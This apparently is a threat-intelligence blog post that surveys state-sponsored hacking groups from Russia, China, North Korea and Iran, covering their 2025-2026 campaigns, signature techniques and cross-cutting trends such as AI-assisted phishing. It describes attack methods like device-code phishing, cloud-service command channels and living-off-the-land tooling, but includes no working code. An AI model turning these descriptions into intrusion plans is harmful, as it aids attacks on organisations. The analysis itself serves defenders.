In February 2025, Lazarus Group transferred $1.5 billion in cryptocurrency out of the Bybit exchange in a single afternoon. Fourteen months later, North Korean IT workers embedded inside Western tech companies were sanctioned by the U.S. Treasury. Between those two events, state-sponsored threat actors conducted over 297 documented supply chain attacks, breached 200+ telecom operators across six continents, deployed at least four new wiper families against Ukrainian infrastructure, and integrated AI-generated content into the majority of their phishing operations.
This is not a trend report. It is an adversary census.
TL;DR
- Russia, China, North Korea, and Iran have each expanded their operational tempo and sophistication significantly in 2025–2026
- Living-off-the-land techniques now account for 79% of all detections; 84% of high-severity attacks use no custom malware
- The mean time from initial access to exfiltration has compressed to 72 minutes — four times faster than 2023
- AI is no longer experimental; all four nation-states operationalized LLMs in attack chains by late 2025
- Supply chain attacks jumped 93% year-over-year (154 in 2024 → 297 in 2025)
- China’s Volt Typhoon and Salt Typhoon represent strategic pre-positioning, not traditional espionage — they are ready to activate
The Geopolitical Context of 2026
Cyber operations have completed their transition from covert deniable activity to normalized foreign policy instrument. Three forces define the current landscape.
Geopolitics as ops tempo driver. Russian Sandworm attacks against Ukrainian energy infrastructure now correlate directly with battlefield calendars. Iranian cyber operations pause during domestic internet blackouts and surge within days of military strikes. North Korean cryptocurrency theft funds a weapons program under active sanctions. The link between kinetic and cyber operations is no longer circumstantial — it is structural.
AI integration across all phases. ENISA data for 2025 indicates 80% of phishing campaigns now contain AI-generated content. APT36 used AI as a polymorphic malware assembly line, producing variants faster than signature-based detection can respond. MuddyWater’s Dindoor backdoor — written in Deno’s JavaScript runtime — shows construction patterns consistent with GenAI-assisted development. This is not about one group experimenting; all four major nation-state blocs operationalized LLMs during 2025.
Speed compression. The 2026 benchmark for adversary breakout time is 72 minutes — from initial foothold to active exfiltration. This is a fourfold reduction from prior-year averages. Defenders operating on detection pipelines calibrated for longer dwell times are already behind.
Russia: The Sabotage and Espionage Machine
Russia operates three distinct cyber entities with different mandates: SVR (intelligence collection), GRU (military offensive operations), and FSB (domestic + foreign counterintelligence with espionage function). Each maps to specific APT clusters with non-overlapping missions — an organizational structure that provides strategic flexibility and inter-agency competition.
Midnight Blizzard / APT29 (SVR)
Attribution: Russia’s Foreign Intelligence Service (SVR), assessed with high confidence by multiple Western intelligence services.
Mandate: Long-duration strategic espionage. APT29 does not blow things up. It reads your mail, attends your meetings, and copies your files — then leaves without a trace.
2025–2026 campaigns:
The group’s most operationally creative campaign in this period targeted European diplomatic personnel using wine-tasting event lures. Invitations to exclusive wine-tasting events, crafted to match the social calendars of diplomatic staff, delivered GRAPELOADER — a first-stage loader that establishes persistence and profiles the infected host before pulling down secondary payloads. The campaign, active through April 2025, was notable for the authenticity of its lure infrastructure: functional event websites with legitimate registration flows, legitimate-looking calendar invites, and spoofed sender domains with valid DKIM signatures.
APT29 also continued its abuse of the device code authentication flow — a Microsoft OAuth mechanism intended for devices without browsers (smart TVs, printers). By social-engineering targets into visiting a URL and entering a code, the group obtains valid authentication tokens without ever phishing a password or triggering MFA prompts. Once a token is obtained, it works against any Microsoft 365 service the victim account can access. This technique requires no malware, no exploits, and leaves minimal log artifacts unless token issuance auditing is explicitly enabled.
Signature TTPs:
- Supply chain compromise via trusted software update mechanisms (SolarWinds precedent still active in operational playbook)
- Living-off-the-land using legitimate cloud services (Dropbox, OneDrive, Google Drive) as C2 channels
- GRAPELOADER as initial access → custom implants for long-term persistence
- Device code phishing to bypass MFA without credentials
Fancy Bear / APT28 (GRU Unit 26165)
Attribution: GRU 85th Main Special Service Centre (GTsSS), Unit 26165. Indicted by the U.S. DOJ in 2018; linked to multiple Western intelligence assessments since 2014.
Mandate: Aggressive intelligence collection in support of military operations, plus information operations and election interference.
2025–2026 campaigns:
APT28 released PRISMEX — a sophisticated implant combining steganographic payload delivery with COM hijacking for persistence. PRISMEX embeds command-and-control instructions inside image files distributed through legitimate image hosting services. The COM hijacking mechanism ensures persistence across reboots without writing to standard autorun registry keys, evading many baseline integrity-check tools.
The group’s zero-day portfolio remained active. CVE-2026-21509, a Microsoft Office memory corruption vulnerability, was exploited via weaponized DOC files targeting Ukrainian government ministries. The vulnerability allowed remote code execution through preview pane activation alone — no user interaction beyond opening a folder view.
A sustained router and DNS exploitation campaign, active since August 2025, affected over 200 organizations across NATO member states. APT28 targeted SOHO and enterprise routers with known but unpatched CVEs, converting them into covert relay nodes that forward traffic while appearing as legitimate network infrastructure. The campaign specifically targeted organizations adjacent to Ukrainian logistics and military supply chains.
Signal messenger abuse emerged as a new initial access vector. APT28 compromised Signal accounts of Ukrainian military personnel and government staff using Signal’s legitimate “linked devices” feature — adding attacker-controlled devices to victim accounts without triggering any authentication alerts. All subsequent Signal traffic was silently mirrored to attacker infrastructure.
Signature TTPs:
- PRISMEX: steganographic C2 + COM hijacking persistence
- Zero-day exploitation of Microsoft Office (CVE-2026-21509)
- SOHO/enterprise router compromise for covert relay infrastructure
- Signal linked-device abuse for communication interception
- Spear-phishing with very high fidelity lures referencing real internal context
Primary targeting: NATO member state governments, military logistics, Ukrainian government ministries, think tanks, media organizations
Sandworm / APT44 (GRU Unit 74455)
Attribution: GRU 74455, also known as the Main Centre for Special Technologies (GTsST). Responsible for NotPetya (2017), the 2015–2016 Ukrainian power grid attacks, and the 2018 Winter Olympics attack.
Mandate: Destructive operations. Sandworm is not an espionage group that sometimes breaks things. It is a sabotage unit that occasionally collects intelligence.
2025–2026 campaigns:
Sandworm conducted over ten documented destructive incidents against Ukrainian infrastructure in 2025 alone. The group’s wiper arsenal expanded significantly: AcidPour, Zerolot, and Sting each targeted different infrastructure categories — storage arrays, SCADA systems, and communications respectively.
The most geopolitically significant incident was the DynoWiper deployment against Polish energy infrastructure on December 29, 2025. DynoWiper targeted industrial control systems at a Polish energy distribution facility, overwriting firmware on programmable logic controllers (PLCs) and destroying the master boot record of connected workstations. The attack coincided with increased Russian pressure on NATO’s eastern flank. Poland’s CERT confirmed partial disruption to distribution switching operations; the event was the first confirmed Sandworm-attributed destructive attack on a NATO member state’s critical infrastructure in the current conflict cycle.
DynoWiper’s technical design reflects evolution in Sandworm’s approach. Unlike earlier wipers that targeted Windows filesystems, DynoWiper incorporates ICS-aware components that identify and corrupt specific OPC-UA process namespaces — a level of operational technology specificity that requires either deep intelligence on the target environment or extensive reconnaissance preceding the deployment.
Signature TTPs:
- Custom wiper deployment against ICS/OT environments
- Pre-positioned access maintained for months before destructive phase
- Coordination with kinetic operations on battlefield timelines
- VPN appliance exploitation for initial access
- Living-off-the-land in IT environment → lateral movement to OT network
Primary targeting: Ukrainian critical infrastructure (energy, water, communications, transport); NATO-adjacent logistics and energy; Polish infrastructure (December 2025)
Turla / Snake (FSB Center 16)
Attribution: Russia’s Federal Security Service (FSB), Center 16. Snake rootkit attributed by U.S. DOJ and CISA to Turla in May 2023.
Mandate: Strategic intelligence collection against high-value government and diplomatic targets; counter-espionage tradecraft.
2025–2026 activity:
Turla continued operating Kazuar v2, an updated version of its multi-stage .NET backdoor. Kazuar v2 incorporates enhanced anti-analysis features including timing-based sandbox detection (it sleeps for randomized intervals that exceed typical sandbox execution windows) and process injection techniques that target trusted Windows services.
A notable operational development was documented collaboration between Turla and Gamaredon (another FSB-linked group with a broader, less discriminate targeting profile). Gamaredon provides initial access through commodity phishing at scale; Turla follows behind with Kazuar implants against the specific high-value targets Gamaredon’s access reveals. This represents a modular operation where a less sophisticated group handles noisy initial access and a more disciplined group handles exploitation of valuable targets.
Turla continued exploiting VPN appliances for initial access, and expanded operations into Pakistani government and military infrastructure — an unusual geographic pivot that likely reflects FSB interest in Pakistani intelligence services’ activities in Central Asia.
Signature TTPs:
- Kazuar v2: multi-stage .NET backdoor with anti-analysis evasion
- Gamaredon collaboration for initial access at scale
- VPN appliance exploitation
- Satellite-based C2 infrastructure (legacy, but still observed)
- Hijacking legitimate software update mechanisms
China: Persistence and Pre-Positioning
China’s cyber program is the largest by volume of operations and the most strategically disciplined. The Ministry of State Security (MSS) oversees most APT activity through a contract model — commercial security companies execute operations on behalf of the state, providing a layer of deniability and access to a much larger talent pool than a purely military model would allow. Four clusters dominate current activity.
Wicked Panda / APT41 (MSS)
Attribution: Ministry of State Security, assessed with high confidence. Five members indicted by U.S. DOJ in September 2020.
Mandate: Dual-purpose — espionage for the state combined with financially motivated cybercrime for personal profit. APT41 is one of the few groups where the same individuals conduct intelligence operations and ransomware/data theft operations for personal enrichment.
2025–2026 campaigns:
APT41 recorded a 113% surge in operations in Q1 2025, the largest single-quarter increase in documented activity for any nation-state actor. The expansion correlated with increased U.S.-China trade tensions and targeted U.S. trade policy officials, academic economists, and think tanks with positions on tariff and trade policy.
The group’s most technically innovative new capability was the use of Google Calendar events as a command-and-control channel. The TOUGHPROGRESS malware implant reads event descriptions from a compromised Google Calendar account owned by the attacker. Commands are embedded as base64-encoded strings within event descriptions; results are written back as event responses. Because Google Calendar traffic is HTTPS to a legitimate Google endpoint, it is effectively invisible to most network security tools. No custom infrastructure is required — the C2 runs entirely on Google’s servers.
APT41 exploited CVE-2025-4427 and CVE-2025-4428 in Ivanti Endpoint Manager Mobile (EPMM), chaining an authentication bypass with a remote code execution vulnerability to achieve unauthenticated RCE against internet-facing MDM servers. The exploit chain was weaponized within hours of public PoC availability and used against U.S. government contractors and municipal government networks.
Signature TTPs:
- TOUGHPROGRESS: Google Calendar as C2 channel
- CVE chaining for unauthenticated RCE (Ivanti EPMM CVE-2025-4427/4428)
- Simultaneous espionage + financial crime operations
- Rapid exploitation of newly disclosed vulnerabilities (often within 24 hours)
- Supply chain compromise of software update mechanisms
Primary targeting: U.S. trade and economic policy sector, government contractors, gaming industry (financial motivation), healthcare (IP theft)
Volt Typhoon (MSS-linked)
Attribution: MSS-linked, assessed with high confidence by U.S. CISA, NSA, FBI joint advisories.
Mandate: Pre-positioning in critical infrastructure for potential activation during armed conflict. Volt Typhoon does not steal data. It builds access that can be used to cause disruption at a strategically chosen moment.
2025–2026 activity:
Volt Typhoon maintained previously established access in U.S. electric utilities, oil and gas networks, water treatment facilities, and transportation logistics — with some implants persisting for up to five years undetected. The group’s defining operational characteristic is absolute avoidance of custom malware. Every technique observed uses living-off-the-land binaries: PowerShell, WMI, certutil, netsh, ntdsutil.
The absence of custom tools is not laziness — it is deliberate. In environments where EDR products flag unknown binaries, Volt Typhoon simply never drops unknown binaries. Their entire operational chain runs through signed Windows components, making behavioral detection dependent entirely on understanding what normal administrative activity looks like in a specific environment — and most organizations do not have that baseline established.
Network pivoting occurs through compromised SOHO routers and end-of-life network appliances that sit outside the monitoring perimeter. Volt Typhoon’s relay infrastructure is built from real devices in real ISP networks, giving them source IPs that appear as legitimate U.S. traffic.
The strategic logic is explicit in intelligence assessments: this pre-positioning is designed to give China the ability to disrupt U.S. military logistics, communications, and civilian infrastructure in the event of military conflict over Taiwan or in the broader Indo-Pacific theater.
Signature TTPs:
- 100% LOTL: PowerShell, WMI, certutil, netsh, ntdsutil — no custom malware
- SOHO router compromise for relay infrastructure
- Multi-year persistence without lateral movement (waiting, not exploiting)
- KV-Botnet for routing traffic through compromised SOHO devices
- Focus on OT network access via IT network pivoting
Primary targeting: U.S. electric grid, oil/gas, water treatment, transportation logistics, military-adjacent communications
Salt Typhoon (MSS)
Attribution: MSS. Linked to infrastructure and tradecraft overlapping with other MSS-affiliated clusters.
Mandate: Strategic signals intelligence collection — the cyber equivalent of a wiretap program at national scale.
2025–2026 campaigns:
Salt Typhoon’s operational scope is without parallel in documented cyber espionage. The group breached over 200 telecom operators and ISPs across six continents, with confirmed victims including AT&T, Verizon, T-Mobile, Lumen Technologies, and Viasat. The initial wave of disclosures in late 2024 expanded through 2025 as additional carriers worldwide identified the same implants.
The capability Salt Typhoon established was not simply data theft — it was real-time lawful intercept infrastructure compromise. U.S. carriers are legally required to maintain CALEA (Communications Assistance for Law Enforcement Act) compliant intercept systems that allow court-ordered wiretapping. Salt Typhoon gained access to these systems, effectively giving the MSS the ability to activate wiretaps on any subscriber of affected carriers — the same capability that is supposed to require a federal court order.
Call records, location data, and in some cases real-time audio were accessible for targeted subscribers. Intelligence assessments indicate the group specifically queried records associated with U.S. government personnel, political figures, and intelligence community staff.
In May 2025, the operation expanded to satellite network operators, extending the reach into maritime, aviation, and remote-area communications infrastructure not covered by terrestrial carrier compromise.
Signature TTPs:
- Exploitation of network appliance vulnerabilities (Cisco, Juniper, Fortinet) for carrier-grade infrastructure access
- CALEA intercept system compromise for lawful intercept capability abuse
- Long-dwell persistence in carrier core infrastructure
- Targeted subscriber record queries against specific individuals
- Satellite operator network compromise (May 2025)
Primary targeting: Global telecommunications carriers, ISPs, satellite operators; specific subscriber targets within those networks including government personnel and intelligence community
Leviathan / APT40 (Hainan MSS)
Attribution: Hainan State Security Department (provincial MSS office). Four members indicted by U.S. DOJ in July 2021.
Mandate: Maritime and naval intelligence collection; regional espionage in the Indo-Pacific.
2025–2026 activity:
APT40’s defining operational characteristic is speed. The group maintains a dedicated vulnerability research capability that consistently produces functional exploits within hours of public CVE disclosure — sometimes before vendor patches are available. CISA and Australian Signals Directorate attributed this pattern formally in a 2024 joint advisory that documented APT40 exploiting proof-of-concept code from public repositories within a single business day.
The group’s relay infrastructure relies heavily on compromised SOHO devices — consumer routers, NAS devices, and small business network equipment at the end of their support lifecycle. These devices serve as the first hop in APT40’s operational infrastructure, providing source IP addresses that appear as residential or small-business traffic rather than VPS or data center addresses. The devices are compromised through known CVEs; no zero-days are required because most SOHO devices are never patched.
Signature TTPs:
- Rapid weaponization of newly disclosed CVEs (hours, not days)
- SOHO device compromise as redirector infrastructure
- Web shell deployment as persistent access mechanism
- ProxyLogon/similar Exchange server exploitation
- Maritime and naval research institution targeting
Primary targeting: Indo-Pacific maritime sector, naval research, defense industrial base, academic institutions with Indo-Pacific research programs
North Korea: Crypto Heists and IT Worker Fraud
North Korea’s cyber program is unique in one dimension: it is explicitly self-funding. The Reconnaissance General Bureau (RGB) Cyber Operations Unit is tasked with generating hard currency to fund the weapons program and evade international sanctions. This gives the program a financial mandate absent in other nation-state programs, producing operational behavior that blurs the line between state espionage and organized crime.
Lazarus Group / APT38 (RGB)
Attribution: RGB (Reconnaissance General Bureau), Bureau 121. Extensively attributed by U.S. and allied intelligence services; members sanctioned by OFAC.
Mandate: Financial crime at scale to fund the North Korean state; strategic cyber espionage; selective ransomware operations.
2025–2026 campaigns:
The Bybit heist on February 21, 2025, was the largest cryptocurrency theft in history by a significant margin. Lazarus Group compromised Safe{Wallet} — a multisignature wallet management platform — to inject malicious JavaScript into the signing interface used by Bybit’s treasury team. When Bybit employees confirmed a routine transfer, they were actually signing an attacker-controlled transaction. $1.5 billion in ETH exited the exchange in a single operation and was immediately distributed across a laundering network spanning hundreds of intermediate wallets, cross-chain bridges, and peer-to-peer conversion platforms. The full laundering process took weeks; the theft took minutes.
The group’s total cryptocurrency theft for 2025 was $2.02 billion — a 51% year-over-year increase from 2024’s $1.34 billion figure. This represents a dedicated state revenue stream that has consistently delivered more than North Korea earns from all legitimate exports combined.
In April 2026, Lazarus launched the “Mach-O Man” macOS campaign — a $500 million operation targeting cryptocurrency exchange employees and DeFi protocol developers through macOS-specific malware distributed via trojanized developer tools and fake job offer packages. The campaign exploited the assumption that macOS environments are less monitored than Windows, a gap that persists in most security operations centers.
Lazarus also established a Medusa ransomware affiliate relationship, conducting ransomware attacks against non-cryptocurrency targets through the Medusa RaaS platform. This provides deniability (the attack appears as criminal ransomware) and a secondary revenue stream from ransom payments.
Signature TTPs:
- Smart contract and DeFi protocol exploitation for direct fund theft
- JavaScript injection into web-based transaction signing interfaces
- Trojanized developer tools and packages (800+ malicious npm packages documented)
- macOS-specific malware targeting cryptocurrency sector
- Social engineering of DeFi protocol team members via fake job offers
- Sophisticated cryptocurrency laundering via cross-chain bridges
Primary targeting: Cryptocurrency exchanges, DeFi protocols, blockchain development teams, financial institutions with crypto custody, defense contractors (for intelligence collection parallel to financial operations)
Kimsuky / APT43 (RGB)
Attribution: RGB, assessed with high confidence by U.S., South Korean, and allied intelligence services. Sanctioned by U.S. Treasury in May 2023.
Mandate: Intelligence collection in support of Kim Jong Un’s regime — political, military, and diplomatic intelligence. Secondary mission: credential and financial theft to support operations.
2025–2026 campaigns:
Kimsuky issued a significant operational evolution in late 2025 and early 2026: the pivot to QR code-based phishing (quishing). The FBI issued a formal warning in January 2026 regarding Kimsuky campaigns delivering QR codes via email and physical mail (printed documents sent to think tank researchers and embassy staff). QR codes bypass URL filtering tools that scan hyperlinks in email — most email security gateways cannot evaluate the destination of a QR code image. Victims scanning with mobile devices are directed to credential harvesting sites optimized for mobile browsers.
Embassy and think tank impersonation remained the primary lure theme, consistent with Kimsuky’s intelligence collection mandate. The group created convincing replicas of South Korean, Japanese, and European diplomatic institution web presences and conference registration systems. Approximately 60% of Kimsuky operations target South Korean entities, with the remaining 40% distributed across Japanese, European, and North American research and policy institutions.
Kimsuky documented a zero-day collaboration arrangement with Lazarus Group — sharing access to newly discovered vulnerabilities in exchange for Lazarus providing cryptocurrency laundering infrastructure for Kimsuky-stolen credentials resold to brokers.
Signature TTPs:
- QR code phishing bypassing email URL inspection
- Embassy and diplomatic institution impersonation
- BabyShark, AppleSeed, RandomQuery malware families
- Browser credential theft and session hijacking
- Extension-based credential harvesting targeting Chrome profiles
- Zero-day sharing with Lazarus Group
Primary targeting: South Korean government, military, diplomatic missions; Japanese and European policy institutions; North Korea-focused academics and journalists globally
Andariel / APT45 (RGB)
Attribution: RGB, assessed as subordinate to Lazarus Group organizational structure.
Mandate: Intelligence collection against defense and nuclear sectors; financial crime as secondary objective.
2025–2026 campaigns:
Andariel was sanctioned by the U.S. Treasury in July 2025 specifically for operating an IT worker fraud scheme in which North Korean nationals posed as freelance software developers and remote IT workers at Western companies. The scheme placed individuals inside organizations including defense contractors, aerospace companies, and technology firms. Revenue generated by the IT worker operations funded the RGB’s cyber program; access obtained through employment was used for intelligence collection. The scale was significant — DOJ indictments referenced hundreds of companies across 12+ countries hosting unwitting North Korean employees.
Andariel operates as a Play ransomware affiliate, deploying ransomware against organizations outside its intelligence collection mandate for direct financial return. This represents the same pattern as Lazarus/Medusa: the group uses commercial ransomware to generate revenue and obscure attribution, since Play infections appear as criminal rather than state activity.
Primary targeting: Defense contractors, aerospace companies, nuclear research facilities, technology firms with defense adjacency
Signature TTPs:
- IT worker infiltration via fake freelance developer personas
- Play ransomware deployment for financial return
- Defense contractor targeting for weapons system intelligence
- Nuclear facility and research targeting
Iran: Geopolitically Timed Operations
Iran’s cyber program is coordinated by the Islamic Revolutionary Guard Corps (IRGC) and the Ministry of Intelligence and Security (MOIS). Unlike Russia and China, which maintain relatively consistent operational tempo, Iranian cyber operations show clear synchronization with domestic political events and military actions — a pattern that provides forensic evidence of state command-and-control over ostensibly independent groups.
Charming Kitten / APT33 (IRGC)
Attribution: IRGC, assessed with high confidence by multiple Western intelligence services.
Mandate: Intelligence collection, with particular focus on energy sector and potential destructive capability development.
2025–2026 activity:
APT33 continued targeting petroleum and petrochemical companies across the Middle East, focusing on operational technology networks connected to oilfield management systems. The group deployed Tickler malware — a multi-stage implant using Azure infrastructure as a C2 channel. Like APT41’s Google Calendar technique, Tickler leverages Microsoft’s Azure services to blend C2 traffic with legitimate enterprise cloud traffic.
Improved OPSEC was documented across APT33 operations in this period: reduced reuse of infrastructure, shorter persistence periods before pivoting, and more aggressive anti-forensics behavior in post-compromise activity.
Signature TTPs:
- Tickler malware with Azure-based C2
- Spear-phishing targeting energy sector HR and IT personnel
- PowerShell-based persistence and credential harvesting
- OT network reconnaissance from IT access
OilRig / APT34 (MOIS)
Attribution: Iranian Ministry of Intelligence and Security (MOIS). Extensively attributed by Mandiant, Palo Alto Unit 42, and allied intelligence services.
Mandate: Regional intelligence collection (Gulf states, Iraq, broader Middle East); information operations; selective destructive operations.
2025–2026 campaigns:
APT34’s most significant 2025 campaign targeted Iraqi government ministries and diplomatic missions with two new backdoors: Veaty and Spearal. Veaty uses a novel C2 mechanism — reading commands from email drafts in a compromised email account rather than sending actual emails. Commands arrive as unsent draft messages in an inbox the attacker controls; the implant polls the drafts folder and writes results back as additional drafts. No email is ever actually sent, making the C2 channel essentially invisible to email security monitoring that focuses on sent/received traffic.
Spearal communicates via DNS tunneling with base64-encoded data embedded in DNS TXT record queries — a technique that passes through most network security controls because DNS is treated as infrastructure traffic rather than data traffic.
AI-enhanced operations were documented in APT34’s UAE campaigns — specifically AI-generated spear-phishing content that incorporated accurate details about target individuals’ professional histories, publications, and organizational relationships, dramatically increasing lure quality without proportional increase in operator time.
The January 2026 operational pause is the most significant forensic indicator of state coordination. APT34 operations effectively ceased between January 8–27, 2026 — a period that coincides precisely with an extended Iranian government-imposed internet blackout in response to domestic unrest. The correlation between infrastructure control exercised by the Iranian state and APT34’s operational silence is not explained by coincidence; it is the clearest documented evidence of direct state command over ostensibly independent threat actors.
The group resumed and surged operations following Operation Epic Fury on March 2, 2026 — a U.S.-Israeli military strike on Iranian nuclear facilities. APT34 increased operational tempo across all documented victim sectors within 72 hours of the strike.
Signature TTPs:
- Veaty: email draft C2 (no email actually sent)
- Spearal: DNS tunneling via TXT record queries
- AI-enhanced spear-phishing with accurate personal research
- Operational synchronization with Iranian government internet controls
- Surge pattern following military events involving Iran
Primary targeting: Gulf state governments, Iraqi ministries, U.S. and Israeli-linked organizations, energy sector across Middle East and North Africa
MuddyWater (IRGC)
Attribution: IRGC Intelligence Organization (IRGC-IO), assessed with high confidence by CISA and FBI in a 2022 joint advisory; operations continued and expanded since.
Mandate: Intelligence collection across Middle East and Central Asia; expanding global diplomatic targeting.
2025–2026 campaigns:
MuddyWater conducted Operation Olalampo in January 2026 — a campaign deploying the Dindoor backdoor against government targets in the Gulf and Levant regions. Dindoor is written using the Deno JavaScript runtime (a Node.js alternative), an architectural choice that serves multiple evasion purposes: Deno is not flagged by most AV/EDR products as a suspicious runtime, its process name appears as a JavaScript development tool, and the Deno ecosystem lacks the extensive telemetry collection present in Node.js environments. The decision to use Deno — combined with code structure patterns inconsistent with typical human-authored malware — is assessed as likely involving GenAI-assisted development.
The Phoenix backdoor campaign targeted over 100 organizations, with 75% of victims being embassies or diplomatic missions. Phoenix uses a modular architecture that downloads capability modules on demand, limiting the full attack toolset’s exposure on any single victim. Command-and-control uses legitimate cloud storage providers (OneDrive, Box) as drop points for encrypted command files, with implants polling these locations on randomized intervals.
Signature TTPs:
- Dindoor: Deno-based backdoor with suspected GenAI-assisted development
- Phoenix: modular implant with cloud storage C2
- Heavy focus on embassy and diplomatic mission targeting (75% of Phoenix victims)
- Spear-phishing leveraging compromised government email accounts as senders
- Operation Olalampo: multi-country coordinated campaign
Primary targeting: Middle Eastern and Gulf state embassies, diplomatic missions, government ministries; expanding into European diplomatic targets
Cross-Cutting Trends 2025–2026
AI as Operational Infrastructure
The integration of AI into offensive operations moved from experimental to operational across all four nation-state blocs during 2025. The impact manifests at multiple points in the attack chain.
At the phishing generation layer, ENISA 2025 data indicates 80% of phishing campaigns contain AI-generated content. This does not mean simple typo-correction; it means content that passes human review, references accurate contextual details, and adapts tone to match organizational communication norms inferred from OSINT. The labor cost of producing high-quality phishing content at scale has effectively dropped to near zero.
At the malware development layer, APT36’s documented use of AI as a polymorphic variant generator represents a qualitative shift. Traditional signature-based detection relies on the fact that malware retains identifying characteristics across samples. AI-generated polymorphic variants change structural and syntactic characteristics while preserving functional behavior — creating a detection problem that signature approaches cannot solve.
At the reconnaissance layer, AI-assisted OSINT processing allows adversaries to ingest and correlate vastly larger volumes of public data than human analysts can process. Organizational relationships, personnel movements, travel patterns, and communication networks can be modeled from public sources at a scale that previously required significant analyst resources.
| Nation-State | Documented AI Use | Suspected AI Use |
|---|---|---|
| Russia | AI-generated phishing lures (APT28) | AI-assisted malware polymorphism |
| China | AI-enhanced spear-phishing (APT41 trade-policy targeting) | Automated OSINT correlation |
| North Korea | AI-generated fake developer personas | AI-assisted code for crypto theft tools |
| Iran | AI-enhanced UAE spear-phishing (APT34), GenAI malware dev (MuddyWater) | AI-generated disinformation content |
Supply Chain as Preferred Entry
Supply chain attacks reached 297 documented incidents in 2025, a 93% increase from 154 in 2024. The methodology has diversified significantly beyond the SolarWinds model.
PlushDaemon (China-linked) compromised a Korean VPN software distribution channel — injecting a backdoored installer into the vendor’s own legitimate update infrastructure. Thousands of enterprise installations received the malicious update through a trusted vendor relationship.
Shai-Hulud was the first documented self-replicating npm package — malware that, once installed in a development environment, identifies other npm packages owned by the developer and injects itself into those packages’ publishing pipeline. A single compromised developer account could propagate the malware to all packages they maintain.
Lazarus Group maintained an industrial-scale npm poisoning operation with over 800 malicious packages in the npm registry, targeting cryptocurrency and DeFi developers. Package names mimicked legitimate cryptography and wallet libraries with typosquatting and dependency confusion techniques.
Identity Over Malware
65% of initial access incidents in 2025 were identity-driven — credential theft, session hijacking, token abuse, or MFA bypass — rather than exploit-driven. This figure reflects a fundamental shift in adversary preference: identity-based access is harder to detect, doesn’t trigger AV/EDR, and provides the same or better access as exploiting a vulnerability.
90% of incident investigations documented a material identity weakness as a contributing factor, even when the initial access vector was an exploit. Credential reuse, long-lived tokens, excessive permission scopes, and absence of MFA on privileged accounts are so pervasive that they function as a secondary attack surface regardless of how initial access was achieved.
LOTL Dominance
79% of all detections in 2025 were malware-free — attackers operating exclusively through legitimate system tools, scripting engines, and administrative utilities. 84% of high-severity attacks used LOTL techniques as their primary operational methodology. PowerShell appeared in 71% of documented intrusion cases.
The strategic logic is compelling: in most environments, PowerShell execution by administrative accounts is normal. WMI queries are normal. certutil downloading files is unusual but not consistently monitored. The detection problem is not identifying malicious tools — it is identifying malicious use of legitimate tools in an environment where those tools have legitimate uses that generate similar telemetry.
Volt Typhoon’s zero-custom-malware approach is the extreme end of this spectrum, but it represents the direction the entire adversary landscape is moving. Custom malware is increasingly a liability, not an asset, in heavily monitored environments.
Speed Compression
The median adversary breakout time — from initial foothold to active lateral movement or exfiltration — compressed to 72 minutes in 2026, a fourfold reduction from prior-year metrics. This is not uniformly distributed: the fastest observed operations moved from initial access to domain compromise in under 20 minutes. The 72-minute figure represents median across all documented nation-state intrusions.
Geopolitical Synchronization
The most analytically significant development in the 2025–2026 period is the documented correlation between geopolitical events and cyber operation patterns.
Russia has completed the integration of cyber operations into kinetic warfare doctrine. Sandworm operates on military timelines, not intelligence timelines. DynoWiper’s December 2025 Poland deployment was not opportunistic — it aligned with Russian military pressure on NATO’s eastern flank. Cyber and kinetic are no longer parallel tracks; they are the same track.
China’s Volt Typhoon and Salt Typhoon investments are not traditional espionage. Traditional espionage steals information. Volt Typhoon builds access that can switch off infrastructure. Salt Typhoon’s CALEA compromise enables real-time communications interception of specific targeted individuals — a capability more consistent with preparing a crisis intelligence infrastructure than with routine collection. The strategic read is consistent across multiple intelligence services: this is pre-positioning for a potential conflict scenario, not current-cycle espionage.
Iran has provided the clearest empirical evidence of state command over ostensibly independent APT groups through APT34’s January 2026 operational pause. The pause is not explainable by coincidence. It is not explained by infrastructure disruption (the same infrastructure was active immediately before and after). The only coherent explanation is that the group stopped operating because the state told it to stop — and resumed when the state told it to resume. The surge following Operation Epic Fury follows the same logic: cyber operations are a tool of Iranian statecraft, deployed and retracted in coordination with other instruments of state power.
North Korea’s cryptocurrency theft program is the most financially significant state-directed criminal operation in history. The $2.02 billion taken in 2025 represents a material contribution to a weapons program under comprehensive international sanctions. The Bybit operation demonstrated capability to execute single-event thefts of unprecedented scale; the IT worker fraud scheme demonstrated the ability to maintain long-term covert presence inside Western organizations without technical exploitation. These are not parallel capabilities — they are complementary components of a comprehensive financial warfare program.
The Landscape Ahead
Several trajectories are clear from current evidence.
The nation-state / criminal nexus will deepen. Lazarus/Medusa, Andariel/Play, and Turla/Gamaredon represent different expressions of the same structural trend: nation-states using criminal group infrastructure for deniability, and criminal groups benefiting from nation-state resources and targeting intelligence. Attribution will become progressively harder as this blurring continues.
AI will force a TTPs reset. When 80% of phishing is AI-generated, the behavioral signals that trained analysts have learned to recognize become unreliable. When polymorphic malware generators eliminate stable signatures, signature-based detection degrades. The adversary AI integration that was “early adopter” in 2025 will be industry standard by 2027. Detection engineering will need to adapt at a pace the field has not previously had to sustain.
Speed compression will continue. 72 minutes is not a floor — it is a current average. The factors that compressed breakout time (better automation, better credential access, better LOTL techniques) continue to improve. Defender response pipelines calibrated for multi-hour dwell times are already mismatched to current adversary capability; they will become progressively more mismatched.
More actors, not fewer. At least eight additional nation-states not covered in this assessment maintain operational APT programs — Pakistan, India, Vietnam, Belarus, Israel, and others. As the cost of operating a capable cyber program continues to decline (AI reduces the talent floor; commodity tools reduce the development cost; RaaS reduces the infrastructure cost), the number of state actors with credible offensive capability will expand.
Critical infrastructure is the contested terrain. Volt Typhoon’s multi-year positioning, Sandworm’s ICS-specific wiper development, Salt Typhoon’s CALEA compromise — these are not intelligence programs. They are weapons programs, positioned for activation under conditions that have not yet been met. The infrastructure of daily life — power, water, communications, logistics — is already compromised. The question is not whether, but when and under what conditions those pre-positioned capabilities will be used.
Related Posts
- The World’s Most Dangerous Hacking Teams: A Guide to Nation-State APT Groups — The accessible companion piece to this article; covers the same groups with more foundational context for readers new to APT profiling
- Salt Typhoon: How China Hacked the World’s Largest Telecoms — Deep dive into the Salt Typhoon telecom breach campaign, attack chain, and scope
- LOLBins in 2026: How Attackers Use Windows Against Itself — Full technical breakdown of LOTL techniques used by Volt Typhoon and others
- Entra ID Attacks in Practice: Device Code Phishing, PRT Theft, and Conditional Access Bypass — Covers the device code authentication abuse technique used by APT29
- The Package You Trusted: How the Axios Supply Chain Attack Happened — Supply chain attack anatomy, relevant to Lazarus npm poisoning campaigns
- Modern Windows Attack Techniques in 2026 — Cross-reference for LOTL, steganography, and COM hijacking techniques used by APT28’s PRISMEX
Sources
